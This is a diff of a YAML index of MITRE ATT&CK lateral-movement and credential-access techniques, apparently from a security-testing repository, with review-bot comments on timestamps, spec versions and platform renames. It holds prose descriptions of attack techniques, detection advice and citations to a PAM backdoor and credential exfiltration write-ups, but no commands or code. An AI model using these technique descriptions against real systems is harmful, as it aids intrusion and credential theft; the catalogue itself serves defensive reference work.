@@ -41588,7 +42273,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1563.001:
technique:
@@ -41625,7 +42309,7 @@ lateral-movement:
url: https://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident
description: Hodgson, M. (2019, May 8). Post-mortem and remediations for Apr
11 security incident. Retrieved February 17, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-23T23:11:24.682Z'
name: SSH Hijacking
description: |-
Adversaries may hijack a legitimate user's SSH session to move laterally within an environment. Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair.
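Review bot: As with T1602.001 earlier in this patch, the `modified` timestamp for T1563.001 goes backwards, from `2021-04-29T14:49:39.188Z` to `2020-03-23T23:11:24.682Z`; this is a second indicator that the source bundle may be older than the data it replaces and is worth checking before merge.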
@@ -41656,8 +42340,6 @@ lateral-movement:
- root
x_mitre_system_requirements:
- SSH service enabled, trust relationships configured, established connections
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1021.002:
technique:
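Review bot: T1563.001 loses `x_mitre_attack_spec_version: 2.1.0` along with `spec_version` and gets no replacement, whereas the other techniques in this patch are moved to `x_mitre_attack_spec_version: 3.2.0`; either the field should be re-added with the current value or the inconsistency should be explained in the commit message.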
@@ -41740,12 +42422,11 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1021.002
atomic_tests: []
T1550:
technique:
- modified: '2024-04-12T21:18:23.798Z'
+ modified: '2024-10-15T16:09:19.001Z'
name: Use Alternate Authentication Material
description: "Adversaries may use alternate authentication material, such as
password hashes, Kerberos tickets, and application access tokens, in order
@@ -41772,6 +42453,7 @@ lateral-movement:
phase_name: lateral-movement
x_mitre_contributors:
- Blake Strom, Microsoft Threat Intelligence
+ - Pawel Partyka, Microsoft Threat Intelligence
x_mitre_deprecated: false
x_mitre_detection: 'Configure robust, consistent account activity audit policies
across the enterprise and with externally accessible services.(Citation: TechNet
@@ -41789,12 +42471,12 @@ lateral-movement:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Office 365
- SaaS
- - Google Workspace
- IaaS
- Containers
- x_mitre_version: '1.3'
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Logon Session: Logon Session Creation'
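Review bot: The T1550 platform list adds `Identity Provider`, a value that does not appear in the removed `Office 365` / `Google Workspace` set, alongside the `Office Suite` consolidation; make sure any per-platform index or platform allow-list in this repository knows the new name, or the technique will be missing from the Identity Provider view.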
@@ -41820,14 +42502,13 @@ lateral-movement:
description: NIST. (n.d.). Authentication. Retrieved January 30, 2020.
url: https://csrc.nist.gov/glossary/term/authentication
- source_name: NIST MFA
- description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved January
- 30, 2020.
- url: https://csrc.nist.gov/glossary/term/Multi_Factor-Authentication
+ description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved September
+ 25, 2024.
+ url: https://csrc.nist.gov/glossary/term/multi_factor_authentication
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1021:
technique:
@@ -41945,7 +42626,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1563:
technique:
@@ -41999,11 +42679,10 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1021.006:
technique:
- modified: '2023-08-11T15:26:41.941Z'
+ modified: '2024-09-12T15:28:23.398Z'
name: 'Remote Services: Windows Remote Management'
description: |-
Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.
@@ -42055,14 +42734,13 @@ lateral-movement:
April 27, 2016.
url: https://msdn.microsoft.com/en-us/library/aa394582.aspx
- source_name: Microsoft WinRM
- description: Microsoft. (n.d.). Windows Remote Management. Retrieved November
- 12, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa384426
+ description: Microsoft. (n.d.). Windows Remote Management. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/winrm/portal
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1021.006
atomic_tests: []
T1021.003:
@@ -42148,12 +42826,11 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1021.003
atomic_tests: []
T1550.003:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T15:21:09.330Z'
name: 'Use Alternate Authentication Material: Pass the Ticket'
description: |-
Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.
@@ -42173,6 +42850,7 @@ lateral-movement:
x_mitre_contributors:
- Vincent Le Toux
- Ryan Becwar
+ x_mitre_deprecated: false
x_mitre_detection: |-
Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.
@@ -42180,7 +42858,6 @@ lateral-movement:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
@@ -42196,39 +42873,40 @@ lateral-movement:
id: attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926
created: '2020-01-30T17:03:43.072Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1550/003
external_id: T1550.003
- - source_name: ADSecurity AD Kerberos Attacks
- description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
- Kerberos Attacks. Retrieved June 2, 2016.
- url: https://adsecurity.org/?p=556
- - source_name: GentilKiwi Pass the Ticket
- description: Deply, B. (2014, January 13). Pass the ticket. Retrieved June
- 2, 2016.
- url: http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+ - source_name: CERT-EU Golden Ticket Protection
+ description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
+ April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
+ url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
- source_name: Campbell 2014
description: Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December
4, 2014.
url: http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf
+ - source_name: GentilKiwi Pass the Ticket
+ description: Deply, B. (2014, January 13). Pass the ticket. Retrieved September
+ 12, 2024.
+ url: https://web.archive.org/web/20210515214027/https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+ - source_name: ADSecurity AD Kerberos Attacks
+ description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
+ Kerberos Attacks. Retrieved June 2, 2016.
+ url: https://adsecurity.org/?p=556
- source_name: Stealthbits Overpass-the-Hash
description: Warren, J. (2019, February 26). How to Detect Overpass-the-Hash
Attacks. Retrieved February 4, 2021.
url: https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/
- - source_name: CERT-EU Golden Ticket Protection
- description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
- April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
- url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1550.003
atomic_tests: []
T1021.007:
technique:
- modified: '2023-04-14T22:27:04.095Z'
+ modified: '2024-10-15T15:52:47.255Z'
name: Cloud Services
description: "Adversaries may log into accessible cloud services within a compromised
environment using [Valid Accounts](https://attack.mitre.org/techniques/T1078)
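Review bot: most of this hunk is a reorder rather than a content change: the `CERT-EU Golden Ticket Protection`, `GentilKiwi Pass the Ticket` and `ADSecurity AD Kerberos Attacks` entries keep their text but move position, and `x_mitre_modified_by_ref`, removed from T1550.003 in the previous hunk, is re-added at the end of the object. The substantive edits are the GentilKiwi entry now pointing at a web.archive.org capture with a September 12, 2024 retrieved date and the spec bump to 3.2.0. Consider emitting the index with a stable key and reference order so that a future refresh shows only the real edits.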
@@ -42253,12 +42931,11 @@ lateral-movement:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Office 365
- - Azure AD
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.0'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
type: attack-pattern
@@ -42272,13 +42949,12 @@ lateral-movement:
external_id: T1021.007
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1072:
technique:
- modified: '2024-04-12T03:40:37.954Z'
+ modified: '2024-09-25T20:49:37.227Z'
name: Software Deployment Tools
description: "Adversaries may gain access to and use centralized software suites
installed within an enterprise to execute commands and move laterally through
@@ -42295,7 +42971,7 @@ lateral-movement:
on cloud-hosted instances, as well as the execution of arbitrary commands
on on-premises endpoints. For example, Microsoft Configuration Manager allows
Global or Intune Administrators to run scripts as SYSTEM on on-premises devices
- joined to Azure AD.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
+ joined to Entra ID.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
AD 2020) Such services may also utilize [Web Protocols](https://attack.mitre.org/techniques/T1071/001)
to communicate back to adversary owned infrastructure.(Citation: Mitiga Security
Advisory: SSM Agent as Remote Access Trojan)\n\nNetwork infrastructure devices
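Review bot: the `Azure AD` to `Entra ID` wording change is correctly limited to the description sentence; the citation key `SpecterOps Lateral Movement from Azure to On-Prem AD 2020` on the same lines must stay as it is, because citation keys are resolved by exact name. If this rename was produced by a search-and-replace, check that it did not also touch `source_name` values or other citation keys elsewhere in the file.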
@@ -42343,7 +43019,7 @@ lateral-movement:
- Windows
- Network
- SaaS
- x_mitre_version: '3.0'
+ x_mitre_version: '3.1'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Application Log: Application Log Content'
@@ -42376,7 +43052,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1072
atomic_tests: []
T1210:
@@ -42415,7 +43090,7 @@ lateral-movement:
description: National Vulnerability Database. (2017, September 24). CVE-2014-7169
Detail. Retrieved April 3, 2018.
source_name: NVD CVE-2014-7169
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-02-24T15:06:46.006Z'
name: Exploitation of Remote Services
description: |-
Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.
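Review bot: the `modified` timestamp for T1210 moves backwards, from `2022-05-11T14:00:00.188Z` to `2022-02-24T15:06:46.006Z`, while every other technique in this patch moves forward to a 2024 date. That pattern suggests the regenerated index picked up an older copy of the T1210 object; worth checking the source bundle for this technique before merging.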
@@ -42449,12 +43124,10 @@ lateral-movement:
and goal, the system and exploitable service may need to be remotely accessible
from the internal network.
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1534:
technique:
- modified: '2024-02-16T13:09:39.215Z'
+ modified: '2024-10-15T15:59:36.741Z'
name: Internal Spearphishing
description: |-
After they already have access to accounts or systems within the environment, adversaries may use internal spearphishing to gain access to additional information or compromise other users within the same organization. Internal spearphishing is multi-staged campaign where a legitimate account is initially compromised either by controlling the user's device or by compromising the account credentials of the user. Adversaries may then attempt to take advantage of the trusted internal account to increase the likelihood of tricking more victims into falling for phish attempts, often incorporating [Impersonation](https://attack.mitre.org/techniques/T1656).(Citation: Trend Micro - Int SP)
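Review bot: for T1210 this hunk removes `x_mitre_attack_spec_version: 2.1.0` together with `spec_version` and adds no replacement, whereas other techniques on an older spec in this patch are bumped to 3.2.0 (T1021.006 above, T1110.002 below). Unless the field is re-added in a part of the T1210 object not shown here, the technique ends up without a spec version; either add `x_mitre_attack_spec_version: 3.2.0` or explain the omission in the commit message.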
@@ -42482,10 +43155,9 @@ lateral-movement:
- Windows
- macOS
- Linux
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Traffic Flow'
@@ -42515,7 +43187,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1570:
technique:
@@ -42577,12 +43248,11 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1570
atomic_tests: []
T1550.004:
technique:
- modified: '2023-09-19T21:26:24.725Z'
+ modified: '2024-10-15T16:11:15.657Z'
name: Web Session Cookie
description: |-
Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)
@@ -42606,11 +43276,10 @@ lateral-movement:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Office 365
- SaaS
- - Google Workspace
- IaaS
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Web Credential: Web Credential Usage'
@@ -42635,9 +43304,8 @@ lateral-movement:
url: https://wunderwuzzi23.github.io/blog/passthecookie.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1563.002:
technique:
@@ -42697,7 +43365,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1563.002
atomic_tests: []
T1550.002:
@@ -42752,7 +43419,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1550.002
atomic_tests: []
T1021.001:
@@ -42820,12 +43486,11 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1021.001
atomic_tests: []
T1550.001:
technique:
- modified: '2024-04-12T21:18:28.848Z'
+ modified: '2024-10-15T15:38:11.583Z'
name: Application Access Token
description: "Adversaries may use stolen application access tokens to bypass
the typical authentication process and access restricted accounts, information,
@@ -42882,6 +43547,7 @@ lateral-movement:
- Dylan Silva, AWS Security
- Jack Burns, HubSpot
- Blake Strom, Microsoft Threat Intelligence
+ - Pawel Partyka, Microsoft Threat Intelligence
x_mitre_deprecated: false
x_mitre_detection: 'Monitor access token activity for abnormal use and permissions
granted to unusual or suspicious applications and APIs. Additionally, administrators
@@ -42892,13 +43558,12 @@ lateral-movement:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Office 365
- SaaS
- - Google Workspace
- Containers
- IaaS
- - Azure AD
- x_mitre_version: '1.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.7'
x_mitre_data_sources:
- 'Web Credential: Web Credential Usage'
x_mitre_defense_bypassed:
@@ -42957,7 +43622,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
credential-access:
T1557:
@@ -43051,49 +43715,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Scott Knight, @sdotknight, VMware Carbon Black
- - George Allen, VMware Carbon Black
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
- type: attack-pattern
- created: '2020-06-26T04:01:09.648Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.003
- url: https://attack.mitre.org/techniques/T1556/003
- - source_name: Apple PAM
- url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
- description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
- Retrieved June 25, 2020.
- - source_name: Man Pam_Unix
- url: https://linux.die.net/man/8/pam_unix
- description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
- 25, 2020.
- - source_name: Red Hat PAM
- url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
- description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
- (PAM). Retrieved June 25, 2020.
- - source_name: PAM Backdoor
- url: https://github.com/zephrax/linux-pam-backdoor
- description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
- 25, 2020.
- - source_name: PAM Creds
- url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
- description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
- PAM backdoors & DNS requests. Retrieved June 26, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-21T16:19:55.082Z'
name: 'Modify Authentication Process: Pluggable Authentication Modules'
description: |-
Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is pam_unix.so
, which retrieves, sets, and verifies account authentication information in /etc/passwd
and /etc/shadow
.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
@@ -43108,20 +43733,57 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Scott Knight, @sdotknight, VMware Carbon Black
+ - George Allen, VMware Carbon Black
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor PAM configuration and module paths (ex: /etc/pam.d/
) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Logon Session: Logon Session Creation'
- x_mitre_permissions_required:
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+ created: '2020-06-26T04:01:09.648Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/003
+ external_id: T1556.003
+ - source_name: Apple PAM
+ description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+ Retrieved June 25, 2020.
+ url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+ - source_name: Man Pam_Unix
+ description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+ 25, 2020.
+ url: https://linux.die.net/man/8/pam_unix
+ - source_name: PAM Creds
+ description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+ PAM backdoors & DNS requests. Retrieved June 26, 2020.
+ url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+ - source_name: Red Hat PAM
+ description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+ (PAM). Retrieved June 25, 2020.
+ url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+ - source_name: PAM Backdoor
+ description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+ 25, 2020.
+ url: https://github.com/zephrax/linux-pam-backdoor
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.003
atomic_tests: []
T1056.001:
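Review bot: `x_mitre_permissions_required: [root]` is dropped from T1556.003 without replacement, while every other key removed in the previous hunk (contributors, platforms, id, created, external_references) reappears here in a new order. If the field is gone upstream that is fine, but anything that filters this index by required permissions should be checked and the drop deserves a line in the commit message. The `external_references` order also changes (`PAM Creds` moves ahead of `Red Hat PAM`), which is diff noise rather than a content change.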
@@ -43201,12 +43863,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1056.001
atomic_tests: []
T1110.001:
technique:
- modified: '2023-10-16T16:57:41.743Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Brute Force: Password Guessing'
description: |-
Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts.
@@ -43235,6 +43896,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
- Mohamed Kmal
@@ -43246,18 +43908,18 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Application Log: Application Log Content'
@@ -43284,14 +43946,11 @@ credential-access:
url: https://www.us-cert.gov/ncas/alerts/TA18-086A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1110.001
atomic_tests: []
T1003:
technique:
- modified: '2024-04-18T23:47:41.667Z'
+ modified: '2024-10-15T15:12:43.034Z'
name: OS Credential Dumping
description: |
Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password. Credentials can be obtained from OS caches, memory, or structures.(Citation: Brining MimiKatz to Unix) Credentials can then be used to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted information.
@@ -43415,12 +44074,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003
atomic_tests: []
T1539:
technique:
- modified: '2024-04-16T12:56:56.861Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Steal Web Session Cookie
description: |-
An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website.
@@ -43435,10 +44093,11 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
- Johann Rehberger
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: Monitor for attempts to access files and repositories on
a local system that are used to store browser session cookies. Monitor for
@@ -43446,14 +44105,14 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Process: Process Access'
- 'File: File Access'
@@ -43496,14 +44155,11 @@ credential-access:
url: https://blog.talosintelligence.com/roblox-scam-overview/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1539
atomic_tests: []
T1003.002:
technique:
- modified: '2023-07-24T18:53:10.860Z'
+ modified: '2024-10-15T16:40:52.174Z'
name: 'OS Credential Dumping: Security Account Manager'
description: "Adversaries may attempt to extract credential material from the
Security Account Manager (SAM) database either through in-memory techniques
@@ -43558,14 +44214,13 @@ credential-access:
url: https://github.com/Neohapsis/creddump7
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003.002
atomic_tests: []
T1552.005:
technique:
- modified: '2023-03-21T13:56:27.910Z'
+ modified: '2024-10-15T16:24:20.219Z'
